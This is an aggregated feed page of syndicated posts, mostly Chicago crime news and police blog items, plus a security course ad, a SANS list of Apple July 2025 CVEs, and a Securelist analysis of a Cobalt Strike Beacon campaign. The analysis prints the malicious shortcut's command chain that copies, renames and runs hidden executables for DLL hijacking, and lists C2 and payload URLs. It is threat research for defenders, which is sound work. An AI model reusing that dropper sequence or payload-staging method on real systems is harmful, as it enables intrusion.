CWB Chicago ([syndicated profile] cwb_feed) wrote2025-07-30 10:57 am

18 years in federal prison for violent machine gun-fueled carjacking spree

Posted by Tim Hecke

A Chicago man has been sentenced to 18 years in federal prison for a terrifying 2021 carjacking rampage in which he fired into an occupied vehicle, stole another car at gunpoint, and led police on a high-speed, crash-filled chase while armed with a machine gun.

Kiar Evans, 26, was convicted by a jury last year on four federal counts: carjacking, attempted carjacking, illegal possession of a firearm by a felon, and brandishing a firearm during a crime of violence. This month, U.S. District Judge Martha M. Pacold handed down a 216-month sentence, followed by three years of supervised release.

The case stems from a violent afternoon on May 20, 2021, when Evans, fleeing a crash near Independence Boulevard and Congress Parkway, ran up to a Chevrolet Impala and fired two rounds through its front passenger window. The occupants narrowly escaped serious injury as shattered glass injured one person.

Prosecutors said Evans then turned his weapon—a Glock 19 illegally modified to fire fully automatic—on the driver of a nearby Nissan Altima, carjacked the vehicle at gunpoint, and fled.

Kiar Evans, inset, and bullet holes in the window of a vehicle he tried to carjack. (Chicago Police Department, U.S. District Court records)

His brief flight ended less than three miles away at Harrison Street and Ogden Avenue, where he crashed the Altima in a multi-vehicle pileup. Officers arrested him at the scene and recovered the Glock with an extended magazine, laser sight, and auto switch.

Evans’ spree was captured by surveillance cameras and witnessed by a Chicago police helicopter crew.

At the time of the crimes, Evans had recently been released on parole. Prosecutors noted his extensive criminal history dating back to age 15, including robbery and drug convictions. While in jail awaiting trial, he amassed 18 disciplinary violations—among them, possession of marijuana and crack cocaine.

Assistant U.S. Attorneys Paige Nutini and Jimmy Arce said Evans “did not hesitate to use that gun to intimidate his victims and force his will upon them” and “exhibited a total disregard for the safety and well-being of others.” They emphasized that the lack of serious injuries was “sheer luck.”

Although prosecutors acknowledged Evans’ traumatic upbringing, substance abuse, and the recent fatal shooting of his brother, they argued a significant sentence was necessary to protect the public.

Evans was also ordered to pay $4,642.64 in restitution to his victims.

The post 18 years in federal prison for violent machine gun-fueled carjacking spree appeared first on CWB Chicago.

CQURE Academy ([syndicated profile] paula_janus_feed) wrote2025-07-30 09:35 am

Get a Sneak Peek into the Advanced Windows Security Course!

Posted by Kate Chrzan

Over the years, the Advanced Windows Security Course has amassed hundreds of satisfied students, building a supportive community of cybersecurity enthusiasts and rising talents. We repeat it yearly, each time brainstorming to deliver the freshest techniques for combating cyber threats. As a result, the formula just keeps getting better. 

At CQURE Academy, our Experts consolidate everything they know into practice-filled classes. Uncover only the most relevant knowledge under the guidance of:

  • Paula Januszkiewicz, CQURE Academy CEO, Cybersecurity Expert, Microsoft MVP & RD,
  • Sami Laiho, Windows OS Expert, Microsoft MVP,
  • Peter Kloep, Cybersecurity Expert, Principal IT Architect,
  • Amr Thabet, Cybersecurity Expert,
  • Artur Kalinowski, Cybersecurity Expert,
  • Marcin Krawczyk, Cloud & Cybersecurity Expert,
  • Przemysław Tomasik, Cybersecurity Expert,
  • Damian Widera, Data Platform MVP, MCT, Software Engineer, Cybersecurity Expert.

This year’s agenda looks promising – have a look at what awaits you this season: 

  • Module 1: Attack Case Studies and Building Incident Response Readiness Strategy
  • Module 2: Zero Trust in Practice: Building Secure Architectures Beyond the Perimeter
  • Module 3: Discover Your External Perimeter and Open Source Intelligence in Azure
  • Module 4: AI Agents for Attack Investigation
  • Module 5: Azure Cloud Incident Response – Part 1: Detection
  • Module 6: Privileged Access Abuse in Databases: Detection and Defense
  • Module 7: Real-World Pentesting: Windows Tips, Tricks, and Countermeasures
  • Module 8: PowerShell for Digital Investigation & Threat Hunting
  • Module 9: Azure Cloud Incident Response – Part 2: Response and Recovery
  • Module 10: Tiering, Just-In-Time, and Admin Forest in “Real Life” (Experience from the field)
  • Module 11: How to Think About Azure Kubernetes Security
  • Module 12: Securing Windows Server and Applications in .NET with TLS: Implementation, Pitfalls, and Best Practices

But that’s enough about theory for now. Let’s move to the more practical part, where the real learning takes place. There’s no better way you can get a taste of our training formula than to experience it yourself! 

See what you can look forward to during our live meetings. Dive into Windows Internals: Memory Management with Sami Laiho, Windows OS Expert, Microsoft MVP. 

In this module, Sami will teach you how the most important aspect of an operating system works. Nothing in Windows works without memory, both physical and virtual. Windows can’t read things from the disk; it pages things into memory. Memory fundamentals are filled with myths about the Page File settings, memory leaks, amount of RAM needed etc. During this session, Sami will do a lot of myth busting and this knowledge is vital to anyone working with operating system security and troubleshooting. 

We’ve already shared a bit about the Advanced Windows Security Course with you. Now, discover what our participants have to say about it! 

By joining our training, you’ll gain access to session recordings, additional learning materials, and custom CQURE labs to practice your skills.  

After passing the final exam, you’ll receive a “Windows Security Master 2026” certificate to showcase your skills. 

We will meet from October 28 to December 4, 2025, just in time to kickstart 2026. 

This course is limited to a select number of students only. 

Send us your application and we’ll tell if it’s a good fit.  

See you at CQURE Academy!

The post Get a Sneak Peek into the Advanced Windows Security Course! appeared first on CQURE Academy.

Securelist ([syndicated profile] secure_list_feed) wrote2025-07-30 09:00 am

Cobalt Strike Beacon delivered via GitHub and social media

Posted by Maxim Starodubov, Valery Akulenko, Danila Semenov

Introduction

In the latter half of 2024, the Russian IT industry, alongside a number of entities in other countries, experienced a notable cyberattack. The attackers employed a range of malicious techniques to trick security systems and remain undetected. To bypass detection, they delivered information about their payload via profiles on both Russian and international social media platforms, as well as other popular sites supporting user-generated content. The samples we analyzed communicated with GitHub, Microsoft Learn Challenge, Quora, and Russian-language social networks. The attackers thus aimed to conceal their activities and establish a complex execution chain for the long-known and widely used Cobalt Strike Beacon.

Although the campaign was most active during November and December 2024, it continued until April 2025. After a two-month silence, our security solutions began detecting attacks again. The adversary employed new malicious samples, which were only slightly modified versions of those described in the article.

Kaspersky solutions detect this threat and assign the following verdicts:

  • HEUR:Trojan.Win64.Agent.gen
  • HEUR:Trojan.Win64.Kryptik.gen
  • HEUR:Trojan.WinLNK.Starter.gen
  • MEM:Trojan.Multi.Cobalt.gen
  • HEUR:Trojan.Win32.CobaltStrike.gen

Initial attack vector

The initial attack vector involved spear phishing emails with malicious attachments. The emails were disguised as legitimate communications from major state-owned companies, particularly within the oil and gas sector. The attackers feigned interest in the victims’ products and services to create a convincing illusion of legitimacy and increase the likelihood of the recipient opening the malicious attachment.

Sample spear phishing email

Sample spear phishing email

All attachments we observed were RAR archives with the following structure:

  • Требования.lnk
  • Требования
    • Company Profile.pdf
    • List of requirements.pdf
    • Требования
      • pdf
      • pdf

Company profile.pdf and List of requirements.pdf were decoy files designed to complement the information in the email. The directory Требования\Требования contained executables named Company.pdf and Requirements.pdf, designed to mimic secure PDF documents. The directory itself was hidden, invisible to the user by default.

When Требования.lnk was opened, the files in Требования\Требования were copied to %public%\Downloads\ and renamed: Company.pdf became nau.exe, and Requirements.pdf became BugSplatRc64.dll. Immediately afterward, nau.exe was executed.

%cd% /c echo F | xcopy /h /y %cd%\Требования\Требования %public%\Downloads\

& start %cd%\Требования

& ren %public%\Downloads\Company.pdf nau.exe

& ren %public%\Downloads\Requirements.pdf BugSplatRc64.dll

& %public%\Downloads\nau.exe

Contents of Требования.lnk

Требования.lnk execution sequence

Требования.lnk execution sequence

Malicious agent

Process flow diagram for nau.exe

Process flow diagram for nau.exe

In this attack, the adversary leveraged a common technique: DLL Hijacking (T1574.001). To deploy their malicious payload, they exploited the legitimate Crash reporting Send Utility (original filename: BsSndRpt.exe). The tool is part of BugSplat, which helps developers get detailed, real-time crash reports for their applications. This was the utility that the attackers renamed from Company.pdf to nau.exe.

For BsSndRpt.exe to function correctly, it requires BugSplatRc64.dll. The attackers saved their malicious file with that name, forcing the utility to load it instead of the legitimate file.

To further evade detection, the malicious BugSplatRc64.dll library employs Dynamic API Resolution (T1027.007). This technique involves obscuring API functions within the code, resolving them dynamically only during execution. In this specific case, the functions were obfuscated via a custom hashing algorithm, which shares similarities with CRC (Cyclic Redundancy Check).

Hashing algorithm

Hashing algorithm

A significant portion of the hashes within the malicious sample are XOR-encrypted. Additionally, after each call, the address is removed from memory, and API functions are reloaded if a subsequent call is needed.

MessageBoxW function hook

The primary purpose of BugSplatRc64.dll is to intercept API calls within the legitimate utility’s process address space to execute its malicious code (DLL Substitution, T1574.001). Instead of one of the API functions required by the process, a call is made to a function (which we’ll refer to as NewMessageBox) located within the malicious library’s address space. This technique makes it difficult to detect the malware in a sandbox environment, as the library won’t launch without a specific executable file. In most of the samples we’ve found, the MessageBoxW function call is modified, though we’ve also discovered samples that altered other API calls.

Hooking MessageBoxW

Hooking MessageBoxW

After modifying the intercepted function, the library returns control to the legitimate nau.exe process.

NewMessageBox function

Once the hook is in place, whenever MessageBoxW (or another modified function) is called within the legitimate process, NewMessageBox executes. Its primary role is to run a shellcode, which is loaded in two stages.

First, the executable retrieves HTML content from a webpage located at one of the addresses encrypted within the malicious library. In the sample we analyzed, these addresses were https://techcommunity.microsoft[.]com/t5/user/viewprofilepage/user-id/2631 and https://www.quora[.]com/profile/Marieformach. The information found at both locations is identical. The second address serves as a backup if the first one becomes inactive.

NewMessageBox searches the HTML code retrieved from these addresses for a string whose beginning and end match patterns that are defined in the code and consist of mixed-case alphanumeric characters. This technique allows attackers to leverage various popular websites for storing these strings. We’ve found malicious information hidden inside profiles on GitHub, Microsoft Learn Challenge, Q&A websites, and even Russian social media platforms.

Malicious profiles on popular online platforms

Malicious profiles on popular online platforms

While we didn’t find any evidence of the attackers using real people’s social media profiles, as all the accounts were created specifically for this attack, aligning with MITRE ATT&CK technique T1585.001, there’s nothing stopping the threat actor from abusing various mechanisms these platforms provide. For instance, malicious content strings could be posted in comments on legitimate users’ posts.

The extracted payload is a base64-encoded string with XOR-encrypted data. Decrypted, this data reveals the URL https://raw.githubusercontent[.]com/Mariew14/kong/master/spec/fixtures/verify-prs, which then downloads another XOR-encrypted shellcode.

We initially expected NewMessageBox to execute the shellcode immediately after decryption. Instead, nau.exe launches a child process with the same name and the qstt parameter, in which all of the above actions are repeated once again, ultimately resulting in the execution of the shellcode.

Shellcode

An analysis of the shellcode (793453624aba82c8e980ca168c60837d) reveals a reflective loader that injects Cobalt Strike Beacon into the process memory and then hands over control to it (T1620).

The observed Cobalt sample communicates with the C2 server at moeodincovo[.]com/divide/mail/SUVVJRQO8QRC.

Attribution and victims

The method used to retrieve the shellcode download address is similar to the C2 acquisition pattern that our fellow security analysts observed in the EastWind campaign. In both cases, the URL is stored in a specially crafted profile on a legitimate online platform like Quora or GitHub. In both instances, it’s also encrypted using an XOR algorithm. Furthermore, the targets of the two campaigns partially overlap: both groups of attackers show interest in Russian IT companies.

It’s worth mentioning that while most of the attacks targeted Russian companies, we also found evidence of the malicious activity in China, Japan, Malaysia, and Peru. The majority of the victims were large and medium-sized businesses.

Takeaways

Threat actors are using increasingly complex and clever methods to conceal long-known tools. The campaign described here used techniques like DLL hijacking, which is gaining popularity among attackers, as well as obfuscating API calls within the malicious library and using legitimate resources like Quora, GitHub, and Microsoft Learn Challenge to host C2 addresses. We recommend that organizations adhere to the following guidelines to stay safe:

  • Track the status of their infrastructure and continuously monitor their perimeter.
  • Use powerful security solutions to detect and block malware embedded within bulk email.
  • Train their staff to increase cybersecurity awareness.
  • Secure corporate devices with a comprehensive system that detects and blocks attacks in the early stages.

You can detect the malware described here by searching for the unsigned file BugSplatRc64.dll in the file system. Another indirect sign of an attack could be the presence of Crash reporting Send Utility with any filename other than the original BsSndRpt.exe.

IOCs:

LNK
30D11958BFD72FB63751E8F8113A9B04
92481228C18C336233D242DA5F73E2D5

Legitimate BugSplat.exe
633F88B60C96F579AF1A71F2D59B4566

DLL
2FF63CACF26ADC536CD177017EA7A369
08FB7BD0BB1785B67166590AD7F99FD2
02876AF791D3593F2729B1FE4F058200
F9E20EB3113901D780D2A973FF539ACE
B2E24E061D0B5BE96BA76233938322E7
15E590E8E6E9E92A18462EF5DFB94298
66B6E4D3B6D1C30741F2167F908AB60D
ADD6B9A83453DB9E8D4E82F5EE46D16C
A02C80AD2BF4BFFBED9A77E9B02410FF
672222D636F5DC51F5D52A6BD800F660
2662D1AE8CF86B0D64E73280DF8C19B3
4948E80172A4245256F8627527D7FA96

URL
hxxps://techcommunity[.]microsoft[.]com/users/kyongread/2573674
hxxps://techcommunity[.]microsoft[.]com/users/mariefast14/2631452
hxxps://raw[.]githubusercontent[.]com/fox7711/repos/main/1202[.]dat
hxxps://my[.]mail[.]ru/mail/nadezhd_1/photo/123
hxxps://learn[.]microsoft[.]com/en-us/collections/ypkmtp5wxwojz2
hxxp://10[.]2[.]115[.]160/aa/shellcode_url[.]html
hxxps://techcommunity[.]microsoft[.]com/t5/user/viewprofilepage/user-id/2548260
hxxps://techcommunity[.]microsoft[.]com/t5/user/viewprofilepage/user-id/2631452
hxxps://github[.]com/Mashcheeva
hxxps://my[.]mail[.]ru/mail/veselina9/photo/mARRy
hxxps://github[.]com/Kimoeli
hxxps://www[.]quora[.]com/profile/Marieformach
hxxps://moeodincovo[.]com/divide/mail/SUVVJRQO8QRC

Second City Cop ([syndicated profile] chicago_crime_feed) wrote2025-07-30 12:07 am

CTU Political Tentacles

Posted by SCC

Austin Berg is the Executive Director of the Chicago Policy Center and political gadfly who shines a very bright spotlight on the political underbelly of the Machine and the corruption contained within. This piece he wrote shows how embedded the CTU is in the upcoming elections and how much money they're prepared to spend to keep owning Conehead's ass:

  • The Chicago Teachers Union plans to spend more than $4 million on local politics ahead of the next mayoral election, according to a leaked internal budget document shared with The Last Ward. The budget also shows record spending on union overhead and officer salaries.

    But how much influence that political spending will actually create remains unclear, with recent races suggesting CTU money carries more baggage with Chicago voters than ever before.

    Let’s dive in.

And dive in he does, with leaked documents, easy-to-read explanations and the result of the increasingly toxic atmosphere promoted by the CTU....along with the fallout that might be expected.

Go read it all. We aren't sure how SubStack works, but this article seems to be out in the open and free for now. 

Second City Cop ([syndicated profile] chicago_crime_feed) wrote2025-07-30 12:05 am

Look Who Caught Up

Posted by SCC

What would the media do without independent voices tipping them off to things they ought to have discovered on their own? You know....like "journalism" is supposed to be:

  • Grappling with a massive budget deficit, Chicago Public Schools is ending the practice of providing crossing guards for intersections that exclusively serve private school students.

    Chicago Public Schools said providing crossing guards for private schools is outside its core mission. And facing a $734 million deficit, officials are looking for savings wherever they can find them. The district also said at least two of the crossing guards were students who attend suburban Catholic schools.

    All together, CPS is eliminating 102 crossing guard positions, a third of which only serve private school students. CPS had 732 crossing guard positions last year.

And as we alluded to this past Saturday, it would appear that pretty much all of the cuts are at private / Catholic schools. Other cuts were at those "Safe Passage" locations already manned by parents getting $10-per-hour or more.

Did you know that at many private schools, the teachers have a rotating schedule where they actually act as crossing guards? We say try that at CPS, but you know the CTU would demand even more money than the crossing guards were making.

Second City Cop ([syndicated profile] chicago_crime_feed) wrote2025-07-30 12:03 am

Bodies Litter the Streets

Posted by SCC

CFD overtime cuts??

  • Hey SCC. Here is a good one for our friends at C F.D. Yesterday morning C F.D. ambulance job at the bus stop at 47th Campbell in 009. They get there and person is D.O.A. They call for us but no cars available at the time. What do they do? Put a white sheet over the body and leave. Some citizen calls 911 a half hour later and asks "Is this how something like this is handled? Beat Sgt asks for a C.F.D.supervisor on scene. Gets in touch with assigned ambulance who relates they left because it was shift change.Can't make this up and all documented in death investigation report.

You think there will be a directive to "allow" overtime so dead bodies aren't sitting in the bus shelters?

Second City Cop ([syndicated profile] chicago_crime_feed) wrote2025-07-30 12:01 am

Stop Already

Posted by SCC

Back in the day, you used to be able to access the blog on Department computers. So many people were doing it however, that Phil Cline had the eggheads ban it - it seems that so many people were reading and commenting that it directly affected work, and you can't have government employees being inefficient!

Someone should remind everyone that's doing their shopping online using Department computers, too:


We're assuming this is off-duty after working hours, because there isn't a Watch Operations Lieutenant in the city that would allow this clothing during work hours, right?

SANS Internet Storm Center, InfoCON: green ([syndicated profile] incident_handler_feed) wrote2025-07-30 02:00 am
CWB Chicago ([syndicated profile] cwb_feed) wrote2025-07-30 12:40 am

2 men shot this weekend in River North refused to cooperate with police: CPD

Posted by CWBChicago

Two men were grazed by gunfire in a downtown shooting early Sunday morning, but they didn’t report the incident until hours later — and then refused both medical treatment and police assistance, according to Chicago police.

The men said the shooting occurred around 4:30 a.m. on Sunday in the first block of West Kinzie in River North.

Later that day, officers responded to a call in the 5000 block of West Patterson Avenue, where they met the two victims — a 33-year-old man and a 37-year-old man. The pair told officers they had been walking on Kinzie Street when two unidentified men approached and fired multiple shots at them, a CPD spokesperson said Tuesday evening.

The 33-year-old man sustained graze wounds to the back of his head and leg, while the 37-year-old was grazed on his hand, leg, and head. Both men declined medical attention and refused to file a report with police, according to the spokesperson.

Area Three detectives are investigating.

The men are the 36th and 37th people shot on the Near North Side this year. That total includes 18 people shot during a single drive-by in the 300 block of West Chicago Avenue earlier this month.

Here are the year-to-date shooting totals for the Near North Side since 2019:

2025: 27
2024: 15
2023: 13
2022: 49
2021: 21
2020: 28
2019: 23

CWBChicago includes accidental self-inflicted gunshot injuries, shootings by police, and shootings carried out in self-defense in its tally. Those categories account for one or fewer incidents in each total provided above.

The post 2 men shot this weekend in River North refused to cooperate with police: CPD appeared first on CWB Chicago.

CWB Chicago ([syndicated profile] cwb_feed) wrote2025-07-30 12:22 am

Man fatally stabbed 71-year-old panhandler outside Englewood gas station: prosecutors

Posted by Tim Hecke

A 25-year-old man is facing a first-degree murder charge after authorities said he fatally stabbed a 71-year-old man outside an Englewood gas station in what appeared to be a dispute between two panhandlers.

According to a detention proffer filed by Assistant State’s Attorney Michael Rusch, surveillance footage shows Darius Barney approaching the older man outside the BP gas station at 63rd and Wentworth just after midnight on July 27. Rusch said Barney and the victim, who has not been publicly identified, did not appear to know each other before the murder.

Both men were reportedly panhandling on opposite sides of the store’s entrance. Barney, wearing a black jacket with pink stripes and a pink purse, was seen rummaging through his bag before approaching the victim and engaging him in what appeared to be a one-sided, animated conversation.

Rusch said Barney pulled a knife from his purse and stabbed the older man in the abdomen one time without provocation. Surveillance footage reportedly showed the victim making no aggressive movements before the attack.

Darius Barney and the gas station convenience store where the murder occurred. (Chicago Police Department, Google)

As Barney walked away, he allegedly turned around and waved his hand a couple of times as if he was saying “goodbye” to the victim.

The victim stumbled into the gas station store and collapsed. Paramedics transported him to a hospital, where he was pronounced dead.

Surveillance videos show Barney walking east on 63rd Street for over a mile until he reached another gas station at 63rd and Drexel, Rusch said. Officers arrested him there after hearing a description of the assailant and seeing him walking toward them with his hands behind his back. He allegedly told police the knife was still in his purse.

Judge Antara Rivera detained Barney during a court hearing on Tuesday. He is charged with first-degree murder.

Original reporting you’ll see nowhere else, paid for by our readers. Click here to support our work.

The post Man fatally stabbed 71-year-old panhandler outside Englewood gas station: prosecutors appeared first on CWB Chicago.

CWB Chicago ([syndicated profile] cwb_feed) wrote2025-07-29 11:52 pm

‘ICE RULES’ and swastika graffiti leads to hate crime charges against Hispanic man in Chicago

Posted by Tim Hecke

A 27-year-old Hispanic man is facing hate crime charges after he allegedly spray-painted pro-ICE graffiti and swastikas on several buildings in Little Village with links to Palestinian and immigrant communities.

Philip Dominguez, 38, turned himself in to Chicago police after detectives released surveillance images of the person responsible for the graffiti on Friday.

Prosecutors say Dominguez targeted four locations in the neighborhood on July 19: the district office of Illinois State Senator Celina Villanueva in the 2500 block of South Central Park. and three locations in the 2700 block of West Cermak: the Chicago Liberation Center, Latino Progresando, and a produce store called La Fruteria.

Philip Dominguez, center, and surveillance images of the suspect. (Chicago Police Department)

At each location, Dominguez allegedly spray-painted swastikas—sometimes directly over pro-Palestinian murals, flags, or community messages supporting immigrants. Prosecutors said surveillance footage captured Dominguez defacing the door of Latino Progresando and a mural at La Fruteria, which had displayed the words “Free Palestine.”

The following night, on July 20, around 1:30 a.m., Dominguez returned to La Fruteria and added the phrase “ICE RULES” near the same mural, prosecutors alleged.

Prosecutors said Dominguez admitted to spray-painting all four sites and told detectives he was angry about issues related to Palestine and immigration. Detectives confirmed his admissions through surveillance footage and cell phone location data that allegedly placed him near the crime scenes at the times of the incidents.

All four sites are known for supporting immigrant rights or Palestinian causes. Senator Villanueva’s office window included her name and fliers for pro-Latino initiatives, prosecutors said. Latino Progresando provides legal aid for immigrants, while pamphlets on interactions with ICE were visible outside La Fruteria.

Prosecutors did not seek to detain Dominguez during his first court appearance on Tuesday. Judge Ankur Srivastava ordered him to stay away from the locations that were defaced and avoid contacting certain individuals, according to court records.

He is charged with five counts of hate crime with property damage, felony criminal damage to property, and five counts of misdemeanor property damage.

Original reporting you’ll see nowhere else, paid for by our readers. Click here to support our work.

The post ‘ICE RULES’ and swastika graffiti leads to hate crime charges against Hispanic man in Chicago appeared first on CWB Chicago.

SANS Internet Storm Center, InfoCON: green ([syndicated profile] incident_handler_feed) wrote2025-07-29 09:24 pm

Apple Updates Everything: July 2025, (Tue, Jul 29th)

Apple today released updates for iOS, iPadOS, macOS, watchOS, tvOS, and visionOS. This is a feature release, but it includes significant security updates. Apple patches a total of 89 different vulnerabilities. None of these vulnerabilities has been identified as exploited.

Apple's vulnerability descriptions are not very telling. Most vulnerabilities are likely DoS issues, causing a system or individual subsystems to crash. There are a few privilege escalation and sandbox escape vulnerabilities that Apple addressed in this update. Vulnerabilities identified as memory corruption or heap corruption may lead to code execution, but the exact scope is difficult to ascertain from Apple's limited information.

There are a few "interesting" vulnerabilities:

CVE-2025-43217: Privacy Indicators for microphone or camera access may not be correctly displayed. This, likely, refers to the green dot displayed next to the control center, not the physical LED used by some Apple laptops.

CVE-2025-43240: A download's origin may be incorrectly associated. A "Mark of the Web" issue? Apple uses extended file attributes for this. Sadly, no details to review existing downloads.

For macOS, security-only updates are available for versions back to Ventura (macOS 13). For iOS/iPad OS, updates are available for 18 and 17.

iOS 18.6 and iPadOS 18.6 iPadOS 17.7.9 macOS Sequoia 15.6 macOS Sonoma 14.7.7 macOS Ventura 13.7.7 watchOS 11.6 tvOS 18.6 visionOS 2.6
CVE-2025-24119: An app may be able to execute arbitrary code out of its sandbox or with certain elevated privileges.
Affects Finder
      x x      
CVE-2025-24188: Processing maliciously crafted web content may lead to an unexpected Safari crash.
Affects Safari
    x          
CVE-2025-24220: An app may be able to read a persistent device identifier.
Affects Sandbox Profiles
  x            
CVE-2025-24224: A remote attacker may be able to cause unexpected system termination.
Affects Kernel
  x     x      
CVE-2025-31229: Passcode may be read aloud by VoiceOver.
Affects Accessibility
x              
CVE-2025-31243: An app may be able to gain root privileges.
Affects AppleMobileFileIntegrity
    x x x      
CVE-2025-31273: Processing maliciously crafted web content may lead to memory corruption.
Affects WebKit
x   x     x x x
CVE-2025-31275: A sandboxed process may be able to launch any installed app.
Affects MediaRemote
    x          
CVE-2025-31276: Remote content may be loaded even when the 'Load Remote Images' setting is turned off.
Affects Mail Drafts
x x            
CVE-2025-31278: Processing maliciously crafted web content may lead to memory corruption.
Affects WebKit
  x            
CVE-2025-31279: An app may be able to fingerprint the user.
Affects Find My
  x x x x      
CVE-2025-31280: Processing a maliciously crafted file may lead to heap corruption.
Affects Model I/O
    x          
CVE-2025-31281: Processing a maliciously crafted file may lead to unexpected app termination.
Affects Model I/O
x   x       x x
CVE-2025-43184: A shortcut may be able to bypass sensitive Shortcuts app settings.
Affects Shortcuts
      x x      
CVE-2025-43185: An app may be able to access protected user data.
Affects Voice Control
    x          
CVE-2025-43186: Parsing a file may lead to an unexpected app termination.
Affects afclip
x   x x x x x x
CVE-2025-43187: Running an hdiutil command may unexpectedly execute arbitrary code.
Affects Disk Images
    x x x      
CVE-2025-43188: A malicious app may be able to gain root privileges.
Affects DiskArbitration
    x          
CVE-2025-43189: A malicious app may be able to read kernel memory.
Affects WebContentFilter
    x x        
CVE-2025-43191: An app may be able to cause a denial-of-service.
Affects Admin Framework
    x x x      
CVE-2025-43192: Account-driven User Enrollment may still be possible with Lockdown Mode turned on.
Affects Managed Configuration
    x x        
CVE-2025-43193: An app may be able to cause a denial-of-service.
Affects SecurityAgent
    x x x      
CVE-2025-43194: An app may be able to modify protected parts of the file system.
Affects PackageKit
    x x x      
CVE-2025-43195: An app may be able to access sensitive user data.
Affects CoreServices
    x x x      
CVE-2025-43196: An app may be able to gain root privileges.
Affects libxpc
    x x x      
CVE-2025-43197: An app may be able to access sensitive user data.
Affects Single Sign-On
    x x x      
CVE-2025-43198: An app may be able to access protected user data.
Affects Dock
    x x        
CVE-2025-43199: A malicious app may be able to gain root privileges.
Affects Core Services
    x x x      
CVE-2025-43202: Processing a file may lead to memory corruption.
Affects libnetcore
x   x          
CVE-2025-43206: An app may be able to access protected user data.
Affects System Settings
    x x x      
CVE-2025-43209: Processing maliciously crafted web content may lead to an unexpected Safari crash.
Affects ICU
x x x x x x x x
CVE-2025-43210: Processing a maliciously crafted media file may lead to unexpected app termination or corrupt process memory.
Affects CoreMedia
x x x x x x x x
CVE-2025-43211: Processing web content may lead to a denial-of-service.
Affects WebKit
x x x     x x x
CVE-2025-43212: Processing maliciously crafted web content may lead to an unexpected Safari crash.
Affects WebKit
x   x     x x x
CVE-2025-43215: Processing a maliciously crafted image may result in disclosure of process memory.
Affects Model I/O
    x          
CVE-2025-43216: Processing maliciously crafted web content may lead to an unexpected Safari crash.
Affects WebKit
x x x     x x x
CVE-2025-43217: Privacy Indicators for microphone or camera access may not be correctly displayed.
Affects Accessibility
x x            
CVE-2025-43218: Processing a maliciously crafted USD file may disclose memory contents.
Affects Model I/O
    x          
CVE-2025-43219: Processing a maliciously crafted image may corrupt process memory.
Affects Model I/O
    x          
CVE-2025-43220: An app may be able to access protected user data.
Affects copyfile
  x x x x      
CVE-2025-43221: Processing a maliciously crafted media file may lead to unexpected app termination or corrupt process memory.
Affects Model I/O
x   x       x x
CVE-2025-43222: An attacker may be able to cause unexpected app termination.
Affects CFNetwork
  x x x x      
CVE-2025-43223: A non-privileged user may be able to modify restricted network settings.
Affects CFNetwork
x x x x x x x x
CVE-2025-43225: An app may be able to access sensitive user data.
Affects Notes
  x x x x      
CVE-2025-43227: Processing maliciously crafted web content may disclose sensitive user information.
Affects WebKit
x   x     x x x
CVE-2025-43228: Visiting a malicious website may lead to address bar spoofing.
Affects WebKit
x              
CVE-2025-43229: Processing maliciously crafted web content may lead to universal cross site scripting.
Affects WebKit
    x          
CVE-2025-43230: An app may be able to access user-sensitive data.
Affects CoreMedia Playback
x x x     x x x
CVE-2025-43232: An app may be able to bypass certain Privacy preferences.
Affects PackageKit
    x x x      
CVE-2025-43233: A malicious app acting as a HTTPS proxy could get access to sensitive user data.
Affects Security
    x x x      
CVE-2025-43234: Processing a maliciously crafted texture may lead to unexpected app termination.
Affects Metal
x   x     x x x
CVE-2025-43235: An app may be able to cause a denial-of-service.
Affects Power Management
    x          
CVE-2025-43236: An attacker may be able to cause unexpected app termination.
Affects Power Management
    x x x      
CVE-2025-43237: An app may be able to cause unexpected system termination.
Affects WebContentFilter
    x          
CVE-2025-43238: An app may be able to cause unexpected system termination.
Affects Xsan
    x x x      
CVE-2025-43239: Processing a maliciously crafted file may lead to unexpected app termination.
Affects sips
    x x x      
CVE-2025-43240: A download's origin may be incorrectly associated.
Affects WebKit
    x          
CVE-2025-43241: An app may be able to read files outside of its sandbox.
Affects SceneKit
    x x x      
CVE-2025-43243: An app may be able to modify protected parts of the file system.
Affects Software Update
    x x x      
CVE-2025-43244: An app may be able to cause unexpected system termination.
Affects AMD
    x x x      
CVE-2025-43245: An app may be able to access protected user data.
Affects AppleMobileFileIntegrity
    x x x      
CVE-2025-43246: An app may be able to access sensitive user data.
Affects Spotlight
    x x        
CVE-2025-43247: A malicious app with root privileges may be able to modify the contents of system files.
Affects PackageKit
    x x x      
CVE-2025-43248: A malicious app may be able to gain root privileges.
Affects AppleMobileFileIntegrity
    x x        
CVE-2025-43249: An app may be able to gain root privileges.
Affects AppleMobileFileIntegrity
    x x x      
CVE-2025-43250: An app may be able to break out of its sandbox.
Affects SharedFileList
    x x x      
CVE-2025-43251: A local attacker may gain access to Keychain items.
Affects User Management
    x          
CVE-2025-43252: A website may be able to access sensitive user data when resolving symlinks.
Affects zip
    x          
CVE-2025-43253: A malicious app may be able to launch arbitrary binaries on a trusted device.
Affects AppleMobileFileIntegrity
    x x        
CVE-2025-43254: Processing a maliciously crafted file may lead to unexpected app termination.
Affects file
    x x x      
CVE-2025-43255: An app may be able to cause unexpected system termination.
Affects GPU Drivers
    x x x      
CVE-2025-43256: An app may be able to gain root privileges.
Affects StorageKit
    x x        
CVE-2025-43257: An app may be able to break out of its sandbox.
Affects Archive Utility
    x          
CVE-2025-43259: An attacker with physical access to a locked device may be able to view sensitive user information.
Affects WindowServer
    x x x      
CVE-2025-43260: An app may be able to hijack entitlements granted to other privileged apps.
Affects PackageKit
    x x        
CVE-2025-43261: An app may be able to break out of its sandbox.
Affects File Bookmark
    x x x      
CVE-2025-43265: Processing maliciously crafted web content may disclose internal states of the app.
Affects WebKit
x   x     x x x
CVE-2025-43266: An app may be able to break out of its sandbox.
Affects NSSpellChecker
    x x x      
CVE-2025-43267: An app may be able to access sensitive user data.
Affects Directory Utility
    x          
CVE-2025-43268: A malicious app may be able to gain root privileges.
Affects Kernel
    x          
CVE-2025-43270: An app may gain unauthorized access to Local Network.
Affects Notes
    x x x      
CVE-2025-43273: A sandboxed process may be able to circumvent sandbox restrictions.
Affects CoreMedia
    x          
CVE-2025-43274: A sandboxed process may be able to circumvent sandbox restrictions.
Affects RemoteViewServices
    x          
CVE-2025-43275: An app may be able to break out of its sandbox.
Affects NetAuth
    x x x      
CVE-2025-43276: iCloud Private Relay may not activate when more than one user is logged in at the same time.
Affects Kernel
    x          
CVE-2025-43277: Processing a maliciously crafted audio file may lead to memory corruption.
Affects CoreAudio
x   x     x x x
CVE-2025-6558: Processing maliciously crafted web content may lead to an unexpected Safari crash.
Affects WebKit
x x x     x x x
CVE-2025-7424: Processing maliciously crafted web content may lead to memory corruption.
Affects libxslt
x x x x   x x x
